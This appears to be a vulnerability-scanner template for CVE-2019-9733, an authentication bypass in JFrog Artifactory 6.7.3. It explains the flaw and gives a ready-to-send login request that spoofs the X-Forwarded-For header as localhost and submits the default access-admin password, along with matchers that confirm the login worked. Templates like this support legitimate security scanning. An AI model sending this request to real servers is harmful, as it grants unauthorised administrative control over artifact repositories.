id: CVE-2019-9733 info: name: Artifactory Access-Admin Login Bypass author: akshansh severity: critical description: An issue was discovered in JFrog Artifactory 6.7.3. By default, the access-admin account is used to reset the password of the admin account in case an administrator gets locked out from the Artifactory console. This is only allowable from a connection directly from localhost, but providing a X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory. reference: | - http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html - https://www.ciphertechs.com/jfrog-artifactory-advisory/ - https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6 tags: cve,cve2019,artifactory requests: - raw: - | POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1 Host: {{Hostname}} Content-Length: 60 Accept: application/json, text/plain, */* X-Requested-With: artUI serial: 58 X-Forwarded-For: 127.0.0.1 Request-Agent: artifactoryUI User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Content-Type: application/json Origin: http://{{Hostname}} Referer: http://{{Hostname}}/artifactory/webapp/ Accept-Language: en-US,en;q=0.9 Connection: close {"user":"access-admin","password":"password","type":"login"} matchers-condition: and matchers: - type: word words: - '"username": "access-admin"' part: body - type: status status: - 200